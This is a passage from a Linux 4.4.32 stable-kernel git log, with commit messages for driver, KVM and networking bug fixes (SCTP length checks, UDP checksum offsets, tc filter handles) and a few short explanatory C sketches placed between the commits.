an -EIO error when an invalid read/write is performed.
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Greg Kroah-Hartman [Tue, 15 Nov 2016 06:47:35 +0000 (07:47 +0100)]
Linux 4.4.32
Sumit Saxena [Wed, 9 Nov 2016 10:59:42 +0000 (02:59 -0800)]
scsi: megaraid_sas: fix macro MEGASAS_IS_LOGICAL to avoid regression
commit
5e5ec1759dd663a1d5a2f10930224dd009e500e8 upstream.
This patch will fix regression caused by commit
1e793f6fc0db ("scsi:
megaraid_sas: Fix data integrity failure for JBOD (passthrough)
devices").
The problem was that the MEGASAS_IS_LOGICAL macro did not have
parentheses around its expansion, and as a result the driver ended up
exposing a lot of non-existing SCSI devices (all SCSI commands to
channels 1,2,3 were returned as SUCCESS-DID_OK by the driver).
[mkp: clarified patch description]
Fixes:
1e793f6fc0db920400574211c48f9157a37e3945
Reported-by: Jens Axboe <axboe@kernel.dk>
Signed-off-by: Kashyap Desai <kashyap.desai@broadcom.com>
Signed-off-by: Sumit Saxena <sumit.saxena@broadcom.com>
Tested-by: Sumit Saxena <sumit.saxena@broadcom.com>
Reviewed-by: Tomas Henzl <thenzl@redhat.com>
Tested-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
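An illustration of the macro hygiene issue (the constant name is taken from the driver): with outer parentheses, a negating caller such as !MEGASAS_IS_LOGICAL(scp) negates the whole ternary expression, whereas without them the ! would bind only to the channel comparison inside it:
/* fixed form: the expansion is a single parenthesized expression */
#define MEGASAS_IS_LOGICAL(scp)						\
	((scp)->device->channel < MEGASAS_MAX_PD_CHANNELS ? 0 : 1)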
Alex Deucher [Wed, 11 May 2016 20:16:53 +0000 (16:16 -0400)]
drm/radeon: fix DP mode validation
commit
ff0bd441bdfbfa09d05fdba9829a0401a46635c1 upstream.
Switch the order of the loops to walk the rates on the top
so we exhaust all DP 1.1 rate/lane combinations before trying
DP 1.2 rate/lane combos.
This avoids selecting rates that are supported by the monitor,
but not by the connector, leading to valid modes being rejected.
bug:
https://bugs.freedesktop.org/show_bug.cgi?id=95206
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
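A generic sketch of the loop-order change (the helper and the 8b/10b bandwidth estimate are illustrative, not the radeon code): with the link rates in the outer loop, every lane count at a DP 1.1 rate is tried before any DP 1.2 rate.
#include <linux/errno.h>

/* rates[] is assumed sorted ascending, e.g. { 162000, 270000, 540000 } kHz */
static int pick_dp_config(const unsigned int *rates, int num_rates,
			  int max_lanes, unsigned int mode_clock_khz,
			  unsigned int bpp, unsigned int *out_rate,
			  int *out_lanes)
{
	int i, lanes;

	for (i = 0; i < num_rates; i++) {
		for (lanes = 1; lanes <= max_lanes; lanes <<= 1) {
			/* 8 data bits per symbol after 8b/10b coding */
			unsigned long long max_pix_clock =
				(unsigned long long)rates[i] * lanes * 8 / bpp;

			if (max_pix_clock >= mode_clock_khz) {
				*out_rate = rates[i];
				*out_lanes = lanes;
				return 0;
			}
		}
	}
	return -EINVAL;
}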
Alex Deucher [Fri, 4 Mar 2016 00:26:24 +0000 (19:26 -0500)]
drm/radeon/dp: add back special handling for NUTMEG
commit
c8213a638f65bf487c10593c216525952cca3690 upstream.
When I fixed the dp rate selection in:
092c96a8ab9d1bd60ada2ed385cc364ce084180e
drm/radeon: fix dp link rate selection (v2)
I accidentally dropped the special handling for NUTMEG
DP bridge chips. They require a fixed link rate.
Reviewed-by: Christian König <christian.koenig@amd.com>
Reviewed-by: Ken Wang <Qingqing.Wang@amd.com>
Reviewed-by: Harry Wentland <harry.wentland@amd.com>
Tested-by: Ken Moffat <zarniwhoop@ntlworld.com>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Alex Deucher [Wed, 11 May 2016 20:21:03 +0000 (16:21 -0400)]
drm/amdgpu: fix DP mode validation
commit
c47b9e0944e483309d66c807d650ac8b8ceafb57 upstream.
Switch the order of the loops to walk the rates on the top
so we exhaust all DP 1.1 rate/lane combinations before trying
DP 1.2 rate/lane combos.
This avoids selecting rates that are supported by the monitor,
but not by the connector, leading to valid modes being rejected.
bug:
https://bugs.freedesktop.org/show_bug.cgi?id=95206
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Alex Deucher [Fri, 4 Mar 2016 00:34:28 +0000 (19:34 -0500)]
drm/amdgpu/dp: add back special handling for NUTMEG
commit
02d27234759dc4fe14a880ec1e1dee108cb0b503 upstream.
When I fixed the dp rate selection in:
3b73b168cffd9c392584d3f665021fa2190f8612
drm/amdgpu: fix dp link rate selection (v2)
I accidentally dropped the special handling for NUTMEG
DP bridge chips. They require a fixed link rate.
Reviewed-by: Christian König <christian.koenig@amd.com>
Reviewed-by: Ken Wang <Qingqing.Wang@amd.com>
Reviewed-by: Harry Wentland <harry.wentland@amd.com>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
James Hogan [Thu, 15 Sep 2016 16:20:06 +0000 (17:20 +0100)]
KVM: MIPS: Drop other CPU ASIDs on guest MMU changes
commit
91e4f1b6073dd680d86cdb7e42d7cccca9db39d8 upstream.
When a guest TLB entry is replaced by TLBWI or TLBWR, we only invalidate
TLB entries on the local CPU. This doesn't work correctly on an SMP host
when the guest is migrated to a different physical CPU, as it could pick
up stale TLB mappings from the last time the vCPU ran on that physical
CPU.
Therefore invalidate both user and kernel host ASIDs on other CPUs,
which will cause new ASIDs to be generated when it next runs on those
CPUs.
We're careful only to do this if the TLB entry was already valid, and
only for the kernel ASID where the virtual address it mapped is outside
of the guest user address range.
Signed-off-by: James Hogan <james.hogan@imgtec.com>
Cc: Paolo Bonzini <pbonzini@redhat.com>
Cc: "Radim Krčmář" <rkrcmar@redhat.com>
Cc: Ralf Baechle <ralf@linux-mips.org>
Cc: linux-mips@linux-mips.org
Cc: kvm@vger.kernel.org
Cc: <stable@vger.kernel.org> # 3.17.x-
[james.hogan@imgtec.com: Backport to 3.17..4.4]
Signed-off-by: James Hogan <james.hogan@imgtec.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Greg Kroah-Hartman [Sun, 13 Nov 2016 11:16:15 +0000 (12:16 +0100)]
Revert KVM: MIPS: Drop other CPU ASIDs on guest MMU changes
This reverts commit
d450527ad04ad180636679aeb3161ec58079f1ba which was
commit
91e4f1b6073dd680d86cdb7e42d7cccca9db39d8 upstream as it was
incorrect. A fixed version will be forthcoming.
Reported-by: James Hogan <james.hogan@imgtec.com>
Cc: Paolo Bonzini <pbonzini@redhat.com>
Cc: "Radim Krčmář" <rkrcmar@redhat.com>
Cc: Ralf Baechle <ralf@linux-mips.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Stephen Rothwell [Mon, 30 May 2016 23:38:56 +0000 (09:38 +1000)]
of: silence warnings due to max() usage
commit
aaaab56dba9af4fe75461e0ee13231c1a6ea174d upstream.
pageblock_order can be (at least) an unsigned int or an unsigned long
depending on the kernel config and architecture, so use max_t(unsigned
long ...) when comparing it.
fixes these warnings:
In file included from include/linux/list.h:8:0,
from include/linux/kobject.h:20,
from include/linux/of.h:21,
from drivers/of/of_reserved_mem.c:17:
drivers/of/of_reserved_mem.c: In function ‘__reserved_mem_alloc_size’:
include/linux/kernel.h:748:17: warning: comparison of distinct pointer types lacks a cast
(void) (&_max1 == &_max2); \
^
include/linux/kernel.h:747:9: note: in definition of macro ‘max’
typeof(y) _max2 = (y); \
^
drivers/of/of_reserved_mem.c:131:48: note: in expansion of macro ‘max’
align = max(align, (phys_addr_t)PAGE_SIZE << max(MAX_ORDER - 1, pageblock_ord
^
include/linux/kernel.h:748:17: warning: comparison of distinct pointer types lacks a cast
(void) (&_max1 == &_max2); \
^
include/linux/kernel.h:747:21: note: in definition of macro ‘max’
typeof(y) _max2 = (y); \
^
drivers/of/of_reserved_mem.c:131:48: note: in expansion of macro ‘max’
align = max(align, (phys_addr_t)PAGE_SIZE << max(MAX_ORDER - 1, pageblock_ord
^
Fixes:
1cc8e3458b51 ("drivers: of: of_reserved_mem: fixup the alignment with CMA setup")
Signed-off-by: Stephen Rothwell <sfr@canb.auug.org.au>
Signed-off-by: Rob Herring <robh@kernel.org>
Cc: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
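A sketch of the warning-free form of the line quoted above: the inner comparison goes through max_t() so that MAX_ORDER - 1 (an int) and pageblock_order are compared as the same type:
	align = max(align, (phys_addr_t)PAGE_SIZE << max_t(unsigned long,
							   MAX_ORDER - 1,
							   pageblock_order));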
Willem de Bruijn [Wed, 26 Oct 2016 15:23:07 +0000 (11:23 -0400)]
packet: on direct_xmit, limit tso and csum to supported devices
[ Upstream commit
104ba78c98808ae837d1f63aae58c183db5505df ]
When transmitting on a packet socket with PACKET_VNET_HDR and
PACKET_QDISC_BYPASS, validate device support for features requested
in vnet_hdr.
Drop TSO packets sent to devices that do not support TSO or have the
feature disabled. Note that the latter currently do process those
packets correctly, regardless of not advertising the feature.
Because of SKB_GSO_DODGY, it is not sufficient to test device features
with netif_needs_gso. Full validate_xmit_skb is needed.
Switch to software checksum for non-TSO packets that request checksum
offload if that device feature is unsupported or disabled. Note that
similar to the TSO case, device drivers may perform checksum offload
correctly even when not advertising it.
When switching to software checksum, packets hit skb_checksum_help,
which has two BUG_ONs that trigger if the checksum is not in the linear
segment. Packet sockets always allocate at least up to
csum_start + csum_off + 2 as linear.
Tested by running github.com/wdebruij/kerneltools/psock_txring_vnet.c
ethtool -K eth0 tso off tx on
psock_txring_vnet -d $dst -s $src -i eth0 -l 2000 -n 1 -q -v
psock_txring_vnet -d $dst -s $src -i eth0 -l 2000 -n 1 -q -v -N
ethtool -K eth0 tx off
psock_txring_vnet -d $dst -s $src -i eth0 -l 1000 -n 1 -q -v -G
psock_txring_vnet -d $dst -s $src -i eth0 -l 1000 -n 1 -q -v -G -N
v2:
- add EXPORT_SYMBOL_GPL(validate_xmit_skb_list)
Fixes:
d346a3fae3ff ("packet: introduce PACKET_QDISC_BYPASS socket option")
Signed-off-by: Willem de Bruijn <willemb@google.com>
Acked-by: Eric Dumazet <edumazet@google.com>
Acked-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Marcelo Ricardo Leitner [Tue, 25 Oct 2016 16:27:39 +0000 (14:27 -0200)]
sctp: validate chunk len before actually using it
[ Upstream commit
bf911e985d6bbaa328c20c3e05f4eb03de11fdd6 ]
Andrey Konovalov reported that KASAN detected SCTP reading a slab
beyond its boundaries. This was caused by sctp_sf_ootb(): when handling
out-of-the-blue packets it checked the chunk length only after already
processing the first chunk, so only the 2nd and subsequent chunks were
validated.
The fix is to just move the check upwards so it's also validated for the
1st chunk.
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Reviewed-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
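A generic sketch of the reordered walk (not the exact SCTP state-machine code): every chunk header, including the first one, is validated before its length is used:
#include <linux/types.h>
#include <linux/kernel.h>
#include <linux/sctp.h>
#include <asm/byteorder.h>

static bool ootb_chunks_valid(const u8 *data, size_t len)
{
	size_t off = 0;

	while (off + sizeof(struct sctp_chunkhdr) <= len) {
		const struct sctp_chunkhdr *ch = (const void *)(data + off);
		size_t chunk_len = be16_to_cpu(ch->length);

		/* reject a malformed length before processing the chunk,
		 * first chunk included */
		if (chunk_len < sizeof(struct sctp_chunkhdr))
			return false;

		off += ALIGN(chunk_len, 4);	/* chunks are padded to 4 bytes */
	}
	return true;
}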
Jamal Hadi Salim [Tue, 25 Oct 2016 00:18:27 +0000 (20:18 -0400)]
net sched filters: fix notification of filter delete with proper handle
[ Upstream commit
9ee7837449b3d6f0fcf9132c6b5e5aaa58cc67d4 ]
Daniel says:
While trying out [1][2], I noticed that tc monitor doesn't show the
correct handle on delete:
$ tc monitor
qdisc clsact ffff: dev eno1 parent ffff:fff1
filter dev eno1 ingress protocol all pref 49152 bpf handle 0x2a [...]
deleted filter dev eno1 ingress protocol all pref 49152 bpf handle 0xf3be0c80
some context to explain the above:
The user identity of any tc filter is represented by a 32-bit
identifier encoded in tcm->tcm_handle. Example 0x2a in the bpf filter
above. A user wishing to delete, get or even modify a specific filter
uses this handle to reference it.
Every classifier is free to provide its own semantics for the 32 bit handle.
Example: classifiers like u32 use schemes like 800:1:801 to describe
the semantics of their filters represented as hash table, bucket and
node ids etc.
Classifiers also have internal per-filter representation which is different
from this externally visible identity. Most classifiers set this
internal representation to be a pointer address (which allows fast retrieval
of said filters in their implementations). This internal representation
is referenced with the "fh" variable in the kernel control code.
When a user successfully deletes a specific filter by specifying the correct
tcm->tcm_handle, an event is generated to user space which indicates
which specific filter was deleted.
Before this patch, the "fh" value was sent to user space as the identity.
As an example, what is shown in the sample bpf filter delete event above
is 0xf3be0c80. This is in fact a 32-bit truncation of 0xffff8807f3be0c80,
which happens to be the 64-bit memory address of the internal filter
representation (the address of the corresponding filter's struct cls_bpf_prog).
After this patch the appropriate user identifiable handle as encoded
in the originating request tcm->tcm_handle is generated in the event.
One of the cardinal rules of netlink is that you must be able to take an
event (such as a delete in this case), reflect it back to the
kernel, and successfully delete the filter. This patch achieves that.
Note, this issue has existed since the original TC action
infrastructure code patch back in 2004 as found in:
https://git.kernel.org/cgit/linux/kernel/git/history/history.git/commit/
[1] http://patchwork.ozlabs.org/patch/682828/
[2] http://patchwork.ozlabs.org/patch/682829/
Fixes:
4e54c4816bfe ("[NET]: Add tc extensions infrastructure.")
Reported-by: Daniel Borkmann <daniel@iogearbox.net>
Acked-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Eric Dumazet [Mon, 24 Oct 2016 01:03:06 +0000 (18:03 -0700)]
udp: fix IP_CHECKSUM handling
[ Upstream commit
10df8e6152c6c400a563a673e9956320bfce1871 ]
The first bug was added in commit
ad6f939ab193 ("ip: Add offset parameter to
ip_cmsg_recv"): Tom missed that ipv4 udp messages could be received on
an AF_INET6 socket. ip_cmsg_recv(msg, skb) should have been replaced by
ip_cmsg_recv_offset(msg, skb, sizeof(struct udphdr));
Then commit
e6afc8ace6dd ("udp: remove headers from UDP packets before
queueing") forgot to adjust the offsets now that UDP headers are pulled
before skbs are put in the receive queue.
Fixes:
ad6f939ab193 ("ip: Add offset parameter to ip_cmsg_recv")
Fixes:
e6afc8ace6dd ("udp: remove headers from UDP packets before queueing")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Sam Kumar <samanthakumar@google.com>
Cc: Willem de Bruijn <willemb@google.com>
Tested-by: Willem de Bruijn <willemb@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Jiri Slaby [Fri, 21 Oct 2016 12:13:24 +0000 (14:13 +0200)]
net: sctp, forbid negative length
[ Upstream commit
a4b8e71b05c27bae6bad3bdecddbc6b68a3ad8cf ]
Most of the getsockopt handlers in net/sctp/socket.c check len against
the sizeof of some structure, like:
	if (len < sizeof(int))
		return -EINVAL;
At first glance, the check seems to be correct. But since len is an int
and sizeof returns size_t, the int gets promoted to unsigned size_t too. So
the test returns false for negative lengths. Yes, (-1 < sizeof(long)) is
false.
Fix this in sctp by explicitly checking len < 0 before any getsockopt
handler is called.
Note that sctp_getsockopt_events already handled the negative case.
Since we added the < 0 check elsewhere, this one can be removed.
If not checked, this is the result:
UBSAN: Undefined behaviour in ../mm/page_alloc.c:2722:19
shift exponent 52 is too large for 32-bit type 'int'
CPU: 1 PID: 24535 Comm: syz-executor Not tainted 4.8.1-0-syzkaller #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
rel-1.9.1-0-gb3ef39f-prebuilt.qemu-project.org 04/01/2014
0000000000000000 ffff88006d99f2a8 ffffffffb2f7bdea 0000000041b58ab3
ffffffffb4363c14 ffffffffb2f7bcde ffff88006d99f2d0 ffff88006d99f270
0000000000000000 0000000000000000 0000000000000034 ffffffffb5096422
Call Trace:
[<ffffffffb3051498>] ? __ubsan_handle_shift_out_of_bounds+0x29c/0x300
...
[<ffffffffb273f0e4>] ? kmalloc_order+0x24/0x90
[<ffffffffb27416a4>] ? kmalloc_order_trace+0x24/0x220
[<ffffffffb2819a30>] ? __kmalloc+0x330/0x540
[<ffffffffc18c25f4>] ? sctp_getsockopt_local_addrs+0x174/0xca0 [sctp]
[<ffffffffc18d2bcd>] ? sctp_getsockopt+0x10d/0x1b0 [sctp]
[<ffffffffb37c1219>] ? sock_common_getsockopt+0xb9/0x150
[<ffffffffb37be2f5>] ? SyS_getsockopt+0x1a5/0x270
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Cc: Vlad Yasevich <vyasevich@gmail.com>
Cc: Neil Horman <nhorman@tuxdriver.com>
Cc: "David S. Miller" <davem@davemloft.net>
Cc: linux-sctp@vger.kernel.org
Cc: netdev@vger.kernel.org
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
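A tiny stand-alone C program demonstrating the promotion pitfall described above; the kernel fix simply rejects len < 0 before any handler performs such a comparison:
#include <stdio.h>

int main(void)
{
	int len = -1;

	/* len is promoted to size_t and becomes a huge unsigned value,
	 * so the unsigned comparison below prints the "false" branch */
	if (len < sizeof(int))
		puts("unsigned comparison: -1 < sizeof(int) is true");
	else
		puts("unsigned comparison: -1 < sizeof(int) is false");

	if (len < (int)sizeof(int))
		puts("signed comparison: -1 < 4 is true");

	return 0;
}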
WANG Cong [Thu, 20 Oct 2016 21:19:46 +0000 (14:19 -0700)]
ipv4: use the right lock for ping_group_range
[ Upstream commit
396a30cce15d084b2b1a395aa6d515c3d559c674 ]
This reverts commit
a681574c99be23e4d20b769bf0e543239c364af5
("ipv4: disable BH in set_ping_group_range()") because we never
read ping_group_range in BH context (unlike local_port_range).
Then, since we already have a lock for ping_group_range, the places
using ip_local_ports.lock for ping_group_range are clearly typos.
We might consider sharing a single lock for both ping_group_range
and local_port_range to save space, but that should be for
net-next.
Fixes:
a681574c99be ("ipv4: disable BH in set_ping_group_range()")
Fixes:
ba6b918ab234 ("ping: move ping_group_range out of CONFIG_SYSCTL")
Cc: Eric Dumazet <edumazet@google.com>
Cc: Eric Salo <salo@google.com>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Eric Dumazet [Thu, 20 Oct 2016 17:26:48 +0000 (10:26 -0700)]
ipv4: disable BH in set_ping_group_range()
[ Upstream commit
a681574c99be23e4d20b769bf0e543239c364af5 ]
In commit
4ee3bd4a8c746 ("ipv4: disable BH when changing ip local port
range") Cong added BH protection in set_local_port_range() but missed
that same fix was needed in set_ping_group_range()
Fixes:
b8f1a55639e6 ("udp: Add function to make source port for UDP tunnels")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Eric Salo <salo@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>